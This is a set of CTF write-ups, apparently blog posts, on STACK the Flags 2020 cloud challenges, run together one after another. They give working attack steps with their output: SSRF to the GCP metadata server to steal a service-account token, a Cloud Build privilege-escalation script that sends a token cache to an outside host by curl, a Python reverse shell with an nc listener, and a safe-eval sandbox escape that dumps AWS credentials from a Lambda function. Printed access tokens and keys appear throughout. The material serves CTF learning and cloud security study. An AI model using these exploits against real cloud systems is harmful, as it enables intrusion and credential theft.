Interestingly, we got a 404 Bad Request error, leaking the internal hostname of a instance hosted using GCP Compute Engine (inferred from the gcp-* hostname). If we fix the request by adding a trailing slash to the URL http://122.248.230.66/http://10.240.0.100/index.php?site=http://localhost:80, we can use the Internal Web Proxy application to fetch itself:

Internal Web Proxy

Now, we have a working SSRF within the Google VPC network assigned to the GCP Compute Engine instance! :smile:

Can you smell the flag yet? We are so close to the flag now…
Let’s pause for a minute to see where we are at now:
Attack Path Reaching GCP

Metadata FTW

What’s next? Well, we can enumerate the GCP instance metadata server to get temporary service account credentials.

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/
...
HTTP/1.1 200 OK
Metadata-Flavor: Google
Content-Type: application/text
ETag: 2f6048afc5ce2feb
Date: Thu, 10 Dec 2020 06:16:09 GMT
Server: Metadata Server for VM
Connection: Close
Content-Length: 183
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

attributes/
description
disks/
guest-attributes/
hostname
id
image
licenses/
machine-type
maintenance-event
name
network-interfaces/
preempted
scheduling/
service-accounts/
tags
zone

We see that the depreciated v1beta1 metadata endpoint is still enabled, which is great news for us because that way, we don’t have to set the Metadata-Flavor: Google HTTP header in our requests. There doesn’t appear to be a way to make the Internal Web Proxy application set a custom HTTP header for us, so we won’t be able to fetch metadata from the v1 metadata endpoint via SSRF:

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1/
...
HTTP/1.1 403 Forbidden
Metadata-Flavor: Google
Date: Thu, 10 Dec 2020 06:40:48 GMT
Content-Type: text/html; charset=UTF-8
Server: Metadata Server for VM
Connection: Close
Content-Length: 1636
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
...
$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/service-accounts/
...
[email protected]/
default/
...

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/service-accounts/[email protected]/aliases
...
default
...

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/service-accounts/[email protected]/scopes
...
https://www.googleapis.com/auth/cloud-platform
...

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/service-accounts/[email protected]/token
...
{"access_token":"ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU","expires_in":3395,"token_type":"Bearer"}
...

Here, we can see a service account [email protected] assumes the covid-devops role. The scope of the service account is cloud-platform, which looks really promising. Lastly, we also managed to fetch the OAuth token associated with the service account, allowing us to authenticate and perform actions on behalf of the service account.

We will probably also need the project ID so let’s grab that from the metadata server:

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/project/project-id
...

stack-the-flags-296309
...

Enumerating Google Cloud APIs

Looking at the list of Google Cloud APIs available, we see that there are many APIs available for us to use. Note that not all APIs are enabled or accessible by the service account, so we really should start by figuring out what is accessible to us.

Using the GCP’s Identity and Access Management (IAM) API, let’s try to list all roles in the stack-the-flags-296309 project:

$ curl https://iam.googleapis.com/v1/projects/stack-the-flags-296309/roles/?access_token=ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU
{
  "roles": [
    {
      "name": "projects/stack-the-flags-296309/roles/covid_devops",
      "title": "covid-devops",
      "description": "Created on: 2020-11-22",
      "etag": "BwW0oxMMCDU="
    }
  ]
}

That worked! Seems like there’s only the covid_devops role. Let’s try to view the permissions included for the role:

$ curl https://iam.googleapis.com/v1/projects/stack-the-flags-296309/roles/covid_devops?access_token=ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU
{
  "name": "projects/stack-the-flags-296309/roles/covid_devops",
  "title": "covid-devops",
  "description": "Created on: 2020-11-22",
  "includedPermissions": [
    "cloudbuild.builds.create",
    "compute.instances.get",
    "compute.projects.get",
    "iam.roles.get",
    "iam.roles.list",
    "storage.buckets.create",
    "storage.buckets.get",
    "storage.buckets.list",
    "storage.objects.create"
  ],
  "etag": "BwW0oxMMCDU="
}

We observe a few interesting permissions for the covid_devops role. Since we are looking for the flag, perhaps the flag is stored as an object in a GCP Cloud Storage bucket. However, note that we only have the following permissions relating to GCP Cloud Storage:

  • storage.buckets.create
  • storage.buckets.get
  • storage.buckets.list
  • storage.objects.create

Without storage.objects.get permission, we may be unable to read objects stored in the bucket. Nonetheless, let’s proceed on to enumerate the list of buckets using GCP’s Cloud Storage API:

$ curl https://storage.googleapis.com/storage/v1/b?project=stack-the-flags-296309&access_token=ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU
{
  "kind": "storage#buckets",
  "items": [
    {
      "kind": "storage#bucket",
      "selfLink": "https://www.googleapis.com/storage/v1/b/punggol-digital-lock-key",
      "id": "punggol-digital-lock-key",
      "name": "punggol-digital-lock-key",
      "projectNumber": "605021491171",
      "metageneration": "3",
      "location": "ASIA-SOUTHEAST1",
      "storageClass": "STANDARD",
      "etag": "CAM=",
      "defaultEventBasedHold": false,
      "timeCreated": "2020-11-21T20:14:44.705Z",
      "updated": "2020-11-22T07:53:37.521Z",
      "iamConfiguration": {
        "bucketPolicyOnly": {
          "enabled": true,
          "lockedTime": "2021-02-20T07:53:37.511Z"
        },
        "uniformBucketLevelAccess": {
          "enabled": true,
          "lockedTime": "2021-02-20T07:53:37.511Z"
        }
      },
      "locationType": "region",
      "satisfiesPZS": false
    }
  ]
}

We see that there’s a bucket named punggol-digital-lock-key. Perhaps we need to escalate our privileges to another user with storage.objects.get permissions. Reviewing the privileges of the covid_devops role, we see that there is cloudbuild.builds.create IAM permission.

Road to Impersonating the Cloud Build Service Account

Rhino Security Labs wrote an article on a privilege escalation attack using the cloudbuild.builds.create permission, allowing us to obtain the temporary credentials for the GCP’s Cloud Build service account, which may have greater privileges than our current covid_devops assumed role user.

Rhino Security Labs also created a public GitHub repository for IAM Privilege Escalation in GCP containing the exploit script for escalating privileges via cloudbuild.builds.create permission.

Before we continue, do install the googleapiclient dependency using:

$ pip3 install google-api-python-client --user

Then, grab the exploit script and run it.
In this example, the listening host is 3.1.33.7 and the listening port is 31337:

$ git clone https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation
$ cd GCP-IAM-Privilege-Escalation/ExploitScripts/
$ python3 cloudbuild.builds.create.py -p stack-the-flags-296309 -i 3.1.33.7:31337
No credential file passed in, enter an access token to authenticate? (y/n) y
Enter an access token to use for authentication: ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU
{
    "name": "operations/build/stack-the-flags-296309/YTkzZTZmYTMtOWFmOC00YWFjLTg4NTYtNzRlZjlkNGExZGQw",
    "metadata": {
        "@type": "type.googleapis.com/google.devtools.cloudbuild.v1.BuildOperationMetadata",
        "build": {
            "id": "a93e6fa3-9af8-4aac-8856-74ef9d4a1dd0",
            "status": "QUEUED",
            "createTime": "2020-12-10T07:15:13.788132684Z",
            "steps": [
                {
                    "name": "python",
                    "args": [
                        "-c",
                        "import os;os.system(\"curl -d @/root/tokencache/gsutil_token_cache 3.1.33.7:31337\")"
                    ],
                    "entrypoint": "python"
                }
            ],
            "timeout": "600s",
            "projectId": "stack-the-flags-296309",
            "logsBucket": "gs://605021491171.cloudbuild-logs.googleusercontent.com",
            "options": {
                "logging": "LEGACY"
            },
            "logUrl": "https://console.cloud.google.com/cloud-build/builds/a93e6fa3-9af8-4aac-8856-74ef9d4a1dd0?project=605021491171",
            "queueTtl": "3600s",
            "name": "projects/605021491171/locations/global/builds/a93e6fa3-9af8-4aac-8856-74ef9d4a1dd0"
        }
    }
}
Web server started at 0.0.0.0:31337.
Waiting for token at 3.1.33.7:31337...

$ 

Strange! The access token for the GCP Cloud Build service account is not returned to us!
Perhaps something went wrong. Let’s modify the script to get a reverse shell and investigate further:

Add this line and update the host/port just before the build_body dict:

command = f'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{args.ip_port.split(":")[0]}",{args.ip_port.split(":")[1]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

And, replace these lines:

handler = socketserver.TCPServer(('', int(port)),myHandler)
print(f'Web server started at 0.0.0.0:{port}.')
print(f'Waiting for token at {ip}:{port}...\n')
handler.handle_request()

With these:

print(f'Waiting for reverse shell at {ip}:{port}...\n')
import os; os.system(f"nc -lnvp {port}")

Then, re-run the application again:

$ sudo python3 cloudbuild.builds.create.py -p stack-the-flags-296309 -i 3.1.33.7:31337
No credential file passed in, enter an access token to authenticate? (y/n) y
Enter an access token to use for authentication: ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU
{
    "name": "operations/build/stack-the-flags-296309/MTEzMjBmN2QtNjMzOS00OTMxLTk5NWMtM2ZiZWRkYTNmYWFl",
    "metadata": {
        "@type": "type.googleapis.com/google.devtools.cloudbuild.v1.BuildOperationMetadata",
        "build": {
            "id": "11320f7d-6339-4931-995c-3fbedda3faae",
            "status": "QUEUED",
            "createTime": "2020-12-10T07:15:14.173481293Z",
            "steps": [
                {
                    "name": "python",
                    "args": [
                        "-c",
                        "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"3.1.33.7\",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"
                    ],
                    "entrypoint": "python"
                }
            ],
            "timeout": "600s",
            "projectId": "stack-the-flags-296309",
            "logsBucket": "gs://605021491171.cloudbuild-logs.googleusercontent.com",
            "options": {
                "logging": "LEGACY"
            },
            "logUrl": "https://console.cloud.google.com/cloud-build/builds/11320f7d-6339-4931-995c-3fbedda3faae?project=605021491171",
            "queueTtl": "3600s",
            "name": "projects/605021491171/locations/global/builds/11320f7d-6339-4931-995c-3fbedda3faae"
        }
    }
}
Waiting for reverse shell at 3.1.33.7:31337...

Listening on [0.0.0.0] (family 0, port 8080)
Connection from 34.73.245.117 52068 received!
[email protected]:/workspace#

Hooray! We get a root shell! But remember, our goal is not to achieve root on a Cloud Build container, so let’s continue on to get the access token for the Cloud Build service account.

[email protected]:/workspace# cat /root/tokencache/gsutil_token_cache
cat /root/tokencache/gsutil_token_cache
cat: /root/tokencache/gsutil_token_cache: No such file or directory

Oh no. The exploit script failed because the access token cached for use by gsutil is missing!

There are two ways to get the access token from this point on:

  1. Method 1: Query the Metadata Server directly
  2. Method 2: Install gsutil and make it fetch the access token for you

Method 1: Via GCP Instance Metadata Server

[email protected]:/workspace# curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/?recursive=true
{
    "[email protected]": {
        "aliases": ["default"],
        "email": "[email protected]",
        "scopes": ["https://www.googleapis.com/auth/cloud-platform", "https://www.googleapis.com/auth/cloud-source-tools", "https://www.googleapis.com/auth/userinfo.email"]
    },
    "default": {
        "aliases": ["default"],
        "email": "[email protected]",
        "scopes": ["https://www.googleapis.com/auth/cloud-platform", "https://www.googleapis.com/auth/cloud-source-tools", "https://www.googleapis.com/auth/userinfo.email"]
    }
}

[email protected]:/workspace# curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
{"access_token":"ya29.c.KnLoB_NbLc_ULBLTouabVjmRoc69Z7N8OexLB1Fpwd3rDF4WM7iR1RoIaFLjrPN3G0NBe9jHN8meLZkhtCdZ5MgXfPbZfUryHxELrw-gIHhPNh_zx0M-atbN-krhKGvnfHvJpPCRrKP_QCL8Bvy3-tU5ahY","expires_in":3211,"token_type":"Bearer"}

Method 2: Via gsutil

Using the reverse shell, follow the installation steps for gsutil and then run the following command:

[email protected]:/workspace# gcloud auth application-default print-access-token
ya29.c.KnLoB_NbLc_ULBLTouabVjmRoc69Z7N8OexLB1Fpwd3rDF4WM7iR1RoIaFLjrPN3G0NBe9jHN8meLZkhtCdZ5MgXfPbZfUryHxELrw-gIHhPNh_zx0M-atbN-krhKGvnfHvJpPCRrKP_QCL8Bvy3-tU5ahY

Getting the Final Flag From Bucket

Awesome! We managed to obtain the temporary access token for the default GCP Cloud Build service account!

Let’s test to see if the GCP Cloud Build service account has the storage.buckets.list permission:

$ curl 
https://storage.googleapis.com/storage/v1/b/punggol-digital-lock-key/o?project=stack-the-flags-296309&access_token=ya29.c.KnLoB_NbLc_ULBLTouabVjmRoc69Z7N8OexLB1Fpwd3rDF4WM7iR1RoIaFLjrPN3G0NBe9jHN8meLZkhtCdZ5MgXfPbZfUryHxELrw-gIHhPNh_zx0M-atbN-krhKGvnfHvJpPCRrKP_QCL8Bvy3-tU5ahY
{
  "kind": "storage#objects",
  "items": [
    {
      "kind": "storage#object",
      "id": "punggol-digital-lock-key/last_half.txt/1607586270019961",
      "selfLink": "https://www.googleapis.com/storage/v1/b/punggol-digital-lock-key/o/last_half.txt",
      "mediaLink": "https://storage.googleapis.com/download/storage/v1/b/punggol-digital-lock-key/o/last_half.txt?generation=1607586270019961&alt=media",
      "name": "last_half.txt",
      "bucket": "punggol-digital-lock-key",
      "generation": "1607586270019961",
      "metageneration": "1",
      "contentType": "text/plain",
      "storageClass": "STANDARD",
      "size": "17",
      "md5Hash": "WviwTGRF7YEzWXqehPCbHg==",
      "crc32c": "RtRJWw==",
      "etag": "CPmCyMT1wu0CEAE=",
      "timeCreated": "2020-12-10T07:44:30.019Z",
      "updated": "2020-12-10T07:44:30.019Z",
      "timeStorageClassUpdated": "2020-12-10T07:44:30.019Z"
    }
  ]
}

We finally see the second half of the flag stored as an object in the punggol-digital-lock-key bucket!
Does it also have the storage.objects.get permission?

$ curl https://storage.googleapis.com/download/storage/v1/b/punggol-digital-lock-key/o/last_half.txt?generation=1607586270019961&alt=media&project=stack-the-flags-296309&access_token=ya29.c.KnLoB_NbLc_ULBLTouabVjmRoc69Z7N8OexLB1Fpwd3rDF4WM7iR1RoIaFLjrPN3G0NBe9jHN8meLZkhtCdZ5MgXfPbZfUryHxELrw-gIHhPNh_zx0M-atbN-krhKGvnfHvJpPCRrKP_QCL8Bvy3-tU5ahY
4pPro4ch_Is_G00d}

Yes it does! And there we have it! Combining both pieces of the flag together, we get:

govtech-csg{Mult1_Cl0uD_4pPro4ch_Is_G00d}

Complete Attack Path

Here’s an overview of the complete attack path for this challenge: Overview of Attack Path

Thanks for reading my final write-up on the challenges from STACK the Flags 2020 CTF!

It was fun solving these cloud challenges and gaining a much better understanding of the various services offered by cloud vendors as well as knowing how to perform penetration testing on cloud computing environments.

Here’s a write-up on a cloud challenge titled Hold the Line! Perimeter Defences Doing It's Work! which I solved in STACK the Flags 2020 CTF organized by Government Technology Agency of Singapore (GovTech)’s Cyber Security Group (CSG). Unsurprisingly, there were quite a number of solves since the challenge is rather simple and fairly straightforward.

Those that had analysed the arbitrary JavaScript code injection vulnerability in Bassmaster v1.5.1 (CVE-2014-7205) as part of Advanced Web Attacks and Exploitation (AWAE) course/Offensive Security Web Expert (OSWE) certification will definitely find the injection vector somewhat familiar for this challenge.

This challenge is written by Tan Kee Hock from GovTech’s CSG :)

Hold the Line! Perimeter Defences Doing It’s Work! Cloud Challenge

Description:
Apparently, the lead engineer left the company (“Safe Online Technologies”). He was a talented engineer and worked on many projects relating to Smart City. He goes by the handle c0v1d-agent-1. Everyone didn’t know what this meant until COViD struck us by surprise. We received a tip-off from his colleagues that he has been using vulnerable code segments in one of a project he was working on! Can you take a look at his latest work and determine the impact of his actions! Let us know if such an application can be exploited!

Tax Rebate Checker - http://lcyw7.tax-rebate-checker.cf/

Introduction

Let’s start by visiting the challenge site.

Tax Rebate Checker

Examining the client-side source code, we can see that the main JavaScript file loaded is http://lcyw7.tax-rebate-checker.cf/static/js/main.a6818a36.js, which appears to be webpack-ed. Luckily for us, the source mapping file is also available to us at http://lcyw7.tax-rebate-checker.cf/static/js/main.a6818a36.js.map.

You may have heard of Webpack Exploder by @spaceraccoonsec which helps to unpack the source code of the React Webpack-ed application, but are you aware that Google Chrome’s Developer Tools (Chrome DevTools) supports unpacking of Webpack-ed applications out of the box too?

Using Chrome DevTools, we can inspect the original unpacked source files by navigating to the Sources Tab in the top navigation bar, then click on the webpack:// pseudo-protocol in the left sidebar as such:

Analyse Webpack JavaScript Files Using Chrome DevTools

The source code for index.js is shown below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
import React from 'react';
import ReactDOM from 'react-dom';
import axios from 'axios';

class MyForm extends React.Component {
  constructor() {
    super();
    this.state = {
      loading : false,
      message : ''
    };
    this.onInputchange = this.onInputchange.bind(this);
    this.onSubmitForm = this.onSubmitForm.bind(this);
  }

  renderMessage() {
    return this.state.message;
  }

  renderLoading() {
    return 'Please wait...';
  }

  onInputchange(event) {
    this.setState({
      [event.target.name]: event.target.value
    });
  }

  onSubmitForm() {
    let context = this;
    this.setState({
      loading : true,
      message : "Loading..."
    })
    // any changes, please fix at this [https://github.com/c0v1d-agent-1/tax-rebate-checker]
    axios.post('https://cors-anywhere.herokuapp.com/https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker', {
      age: btoa(this.state.age),
      salary: btoa(this.state.salary)
    })
    .then(function (response) {
      context.setState({
        loading : false,
        message : "You will get (SGD) $" + Math.ceil(response.data.results) + " off your taxes!"
      })
    })
    .catch(function (error) {
      console.log(error);
    });
  }

  render() {
    return (
      <div>
        
        <div>
          <label>
            Annual Salary : <input name="salary" type="number" value={this.state.salary} onChange={this.onInputchange}/>
          </label>
        </div>
        <div>
          <label>
            Age : <input name="age" type="number" value={this.state.age} onChange={this.onInputchange} />
          </label>
        </div>
        <div>
            <button onClick={this.onSubmitForm}>Submit</button>
        </div>
        <br></br>
        <p>{this.state.loading ? this.renderLoading() : this.renderMessage()}</p>
      </div>
    );
  }
}
ReactDOM.render(<MyForm />, document.getElementById('root'));

We can see that there is a comment pointing to a GitHub Repository at https://github.com/c0v1d-agent-1/tax-rebate-checker.
Even if this comment is not provided, we will still be able to find this repository easily by:

  • Searching for c0v1d-agent-1 on GitHub
  • Searching for tax-rebate-checker on GitHub

Tax Rebate Checker GitHub Search

Back to the source code of the React application, we also see the following code:

1
2
3
4
axios.post('https://cors-anywhere.herokuapp.com/https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker', {
    age: btoa(this.state.age),
    salary: btoa(this.state.salary)
})

We discover the use of cors-anywhere proxy, a service which basically helps to relay the request to the target URL and adding Cross-Origin Resource Sharing (CORS) headers. In other words, the target URL is https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker.

Examining the target URL carefully, we can observe that it is a REST API in Amazon API Gateway. Amazon API Gateway is also often used with AWS Lambda, which is something worth noting before we move on to explore what’s in the GitHub repository.

Analysing GitHub Repository

At https://github.com/c0v1d-agent-1/tax-rebate-checker, we see a Node.js application.
The default README mentions Deploy to AWS Lambda service, which is what we noted earlier on already.

Let’s look at the source code of the application. The source code of index.js is shown below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
'use strict';
var safeEval = require('safe-eval')
exports.handler = async (event) => {
    let responseBody = {
        results: "Error!"
    };
    let responseCode = 200;
    try {
        if (event.body) {
            let body = JSON.parse(event.body);
            // Secret Formula
            let context = {person: {code: 3.141592653589793238462}};
            let taxRebate = safeEval((new Buffer(body.age, 'base64')).toString('ascii') + " + " + (new Buffer(body.salary, 'base64')).toString('ascii') + " * person.code",context);
            responseBody = {
                    results: taxRebate
            };
        }
    } catch (err) {
        responseCode = 500;
    }
    let response = {
        statusCode: responseCode,
        headers: {
            "x-custom-header" : "tax-rebate-checker"
        },
        body: JSON.stringify(responseBody)
    };
    return response;
};

Looks like our input supplied as a JSON object containing age and salary are being safeEval().

The safe-eval package is known to be vulnerable in the past, so let’s also check the package.json file to see what version of safe-eval is being used:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
{
  "name": "pension-shecker-lambda",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "author": "",
  "license": "ISC",
  "dependencies": {
    "safe-eval": "^0.3.0"
  }
}

Indeed, the application uses safe-eval v0.3.0, which is a vulnerable version.

Crafting the Exploit Payload

Let’s examine the proof-of-concept exploit script for CVE-2017-16088 for bypassing the safe-eval sandbox:

var safeEval = require('safe-eval');
safeEval("this.constructor.constructor('return process')().exit()");

This seems to return the process global object which allows us to control the current Node.js process.
Even though safe-eval prevents use of require() directly, we can bypass this restruction by using process.mainModule.require(), which provides an alternative way to retrieve require.main.

Now that we have a good idea on how to perform remote code execution on the AWS Lambda function, let’s also take a closer further at the suspicious GitHub issue at https://github.com/c0v1d-agent-1/tax-rebate-checker/issues/1

One of the libraries used by the function was vulnerable.
Resolved by attaching a WAF to the prod deployment.
WAF will not to be attached staging deployment there is no real impact.

Recall that the application at http://lcyw7.tax-rebate-checker.cf/ issues requests to https://cors-anywhere.herokuapp.com/https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker, which effectively forwards incoming requests to https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker – the prod stage!

If there’s a WAF on the prod stage, perhaps we can first target the non-protected staging deployment first and attempt to bypass the WAF if need be.

Before we can try to obtain remote code execution on the AWS Lambda function instance, we need to correctly format our input to the server.
As discussed previously, the Tax Rebate Checker application accepts a JSON input with both age and salary Base64-encoded.
Now, let’s use curl to run the AWS Lambda function on the staging deployment to try to obtain the environment variables set in the AWS Lambda function instance:

$ curl -X POST \
    -H 'Content-Type: application/json' \
    https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/staging/tax-rebate-checker \
    --data '{"age":"'$(printf "this.constructor.constructor('return process')().mainModule.require('child_process').execSync('env').toString()" | base64 -w 0)'","salary":"'$(printf 1 | base64)'"}'
{"results":"AWS_LAMBDA_FUNCTION_VERSION=$LATEST\nflag=St4g1nG_EnV_I5_th3_W34k3$t_Link\nAWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjENj//////////wEaDmFwLXNvdXRoZWFzdC0xIkYwRAIgDbiXQPR7pS/1Jlq8+CvWJEvBWEdzDgMZgmKXB6MbNzUCIFTQNbDFdxZ0qdOmTskWzFOeLpH12FinODzQ8XWo7CdNKtEBCHEQABoMNjQyOTk4NDY5NzM2IgzR7/iDouxfR0H3mQkqrgFHKpR/iXFoOCMF3wtocpFugLFNFVy+LMmgO6JFK56vSGq6zGwzepfYZTV7vLvRauJG9Y9e4o10bLznWugZt3RyH4cWvvHURygQsI5x8BRFMHtqNna7Q/lSWUJIancjx07sHZimJzdRO1SJu5PTu9wI2NFCW6uSKq6z/hHf0Ed8uCMAnkOtGHuY7jfoC2tWNPlByvrEW2mQzBFFgj2DTL/GdFSpS351lFD35am7nVQwibHH/gU64QHk9LffR6ZXw66N/7g5BRYhWGdKyz53O04vrFmttDusAhofGi8T74C1/3x096S1NtASZfVj3YmDwMYOQ1j4D6wEp8CUh5vc7FhQr9l9E8Zdvt78jqyx8l4Wto3UMirBgJDtfEqq5TbcaDP9FM9l1dInGC9Ch6YLJHIRl9Lwctj0s8pveOj0FTN29/PhpkHGWzl4SYSHKOAj/7h1k2J8Sx1JdtyDTKu+X6ACp1uxwDK2k2W2bnrCGVQ/3C2dTzoAINtX9RSk8DcBczXM75/cSi+3u+ClT3SMlBVzUmlPsm90G7U=\nAWS_LAMBDA_LOG_GROUP_NAME=/aws/lambda/tax-rebate-checker\nLAMBDA_TASK_ROOT=/var/task\nLD_LIBRARY_PATH=/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib\nAWS_LAMBDA_RUNTIME_API=127.0.0.1:9001\nAWS_LAMBDA_LOG_STREAM_NAME=2020/12/10/[$LATEST]36472aa2e8e049cfad80aec03f1cae7f\nAWS_EXECUTION_ENV=AWS_Lambda_nodejs12.x\nAWS_XRAY_DAEMON_ADDRESS=169.254.79.2:2000\nAWS_LAMBDA_FUNCTION_NAME=tax-rebate-checker\nPATH=/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin\nAWS_DEFAULT_REGION=ap-southeast-1\nPWD=/var/task\nAWS_SECRET_ACCESS_KEY=drKOGJQgV4HeWciBrP9CgYyAoJrdoFtTHwg0X//f\nLANG=en_US.UTF-8\nLAMBDA_RUNTIME_DIR=/var/runtime\nAWS_LAMBDA_INITIALIZATION_TYPE=on-demand\nAWS_REGION=ap-southeast-1\nTZ=:UTC\nNODE_PATH=/opt/nodejs/node12/node_modules:/opt/nodejs/node_modules:/var/runtime/node_modules:/var/runtime:/var/task\nAWS_ACCESS_KEY_ID=ASIAZLNNSARUIMCNBHX3\nSHLVL=1\n_AWS_XRAY_DAEMON_ADDRESS=169.254.79.2\n_AWS_XRAY_DAEMON_PORT=2000\n_X_AMZN_TRACE_ID=Root=1-5fd1d8f0-7f0800a731b13cf00a3c8db7;Parent=4c8bd2bd54f1fb14;Sampled=0\nAWS_XRAY_CONTEXT_MISSING=LOG_ERROR\n_HANDLER=index.handler\nAWS_LAMBDA_FUNCTION_MEMORY_SIZE=128\n_=/usr/bin/env\n3.141592653589793"}

Note: The -w 0 arguments for base64 command is required to disable line-wrapping and introducing newlines in the input.

Awesome! We found the flag environment set to St4g1nG_EnV_I5_th3_W34k3$t_Link, and we can get the final flag by wrapping it with the flag format:

govtech-csg{St4g1nG_EnV_I5_th3_W34k3$t_Link}

Last weekend, I participated in STACK the Flags 2020 CTF organized by Government Technology Agency of Singapore (GovTech)’s Cyber Security Group (CSG). In this write-up, I will be discussing one of the cloud challenges with no solves – Share and deploy the containers!.

I was extremely close to solving this particular challenge during the competition, but there were some hiccups along the way and I didn’t manage to solve it within the time limit. :cold_sweat:

In retrospect, the Share and deploy the containers! cloud challenge is…

  • Difficult to solve,
  • Time-consuming to solve,
  • Confusing if you don’t understand what the various cloud services are and how they are being used,
  • Messy if you did not keep track of the details while working on the challenge properly (the sheer amount of information is overwhelming),
  • Using common vulnerabilities and also highlights several bad coding practices
  • Quite well-created despite having some bugs which hindered my progress greatly,
  • Relevant to and reflective of real-world cloud penetration testing (it’s tedious and challenging!)

Overall, it was really fun solving this challenge. Kudos to Tan Kee Hock from GovTech’s CSG for creating this amazing challenge!

Share and deploy the containers!

Description:
An agent reportedly working for COViD has been arrested. In his work laptop, we discovered a note from the agent’s laptop. The note contains a warning message from COViD to him! Can you help to investigate what are the applications the captured agent was developing and what vulnerabilities they are purposefully injecting into the applications?

Discovered Note:
https://secretchannel.blob.core.windows.net/covid-channel/notes-from-covid.txt

Introduction

The note at https://secretchannel.blob.core.windows.net/covid-channel/notes-from-covid.txt has the following content:

Agent 007895421,

COViD wants you to inject vulnerabilities in projects that you are working on. Previously you reported that you are working on two projects the upcoming National Pension Records System (NPRS). Please inject vulnerabilities in the two applications.

Regards,
Handler X

From the note, we now learn that there are two projects in the upcoming National Pension Records System (NPRS) which contains some vulnerabilities.

It’s not immediately clear what the final objective is for this challenge, but let’s just proceed on regardless.

Finding Hidden Azure Blobs

Notice that the URL of the note is in the format http://<storage-account>.blob.core.windows.net/<container>/<blob>, which indicates that the note is stored on Azure Blob storage. If you are unfamiliar with Azure Blob storage, do check out the documentation for Azure Blob storage.

